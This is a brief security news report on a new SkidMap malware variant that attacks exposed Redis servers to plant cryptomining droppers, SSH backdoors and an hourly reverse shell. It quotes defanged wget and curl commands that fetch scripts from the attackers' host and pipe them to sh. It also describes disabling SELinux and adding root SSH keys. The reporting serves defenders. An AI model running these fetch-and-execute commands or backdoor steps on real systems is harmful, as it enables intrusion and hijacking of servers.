According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.
Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.
However, the malware's latest version appears considerably more sophisticated and targets only open Redis instances.
Further analysis of the new SkidMap variant showed that it adapts to the operating system it runs on and selects the binary to download based on the Linux distribution and architecture of the infected system.
Initially, the threat actor attempts to log in to open Redis instances in order to set up cron tasks, with a variable holding a base64-encoded string. The decoded string consists of two cron tasks that run a "wget" (wget hxxp://z[.]shavsl[.]com/b -qO - | sh) and a "curl" (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh) command every 10 minutes to download the dropper scripts 'b', 'c' and 'f'.
The dropper scripts download an executable ELF binary named 'gif' (the previous version used 'jpeg') into the '/var/lib/' directory; this file is the trojan.
The trojan first adds SSH keys to the standard locations '/root/.ssh/authorized_keys' and '/root/.ssh/authorized_keys2', leaving a backdoor through which the threat actors can log in to the system.
It then checks the status of SELinux (Security-Enhanced Linux), the kernel module used to enforce access control security policies, and disables it permanently. After this, the trojan establishes persistence by making specific modifications to the host OS.
The trojan opens a reverse shell to the attackers' C2 server every hour over TCP port 8443. The gif binary targets Linux distributions including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.
Trustwave has published a complete report explaining the threat actors' tactics, methods, source code, and further analysis.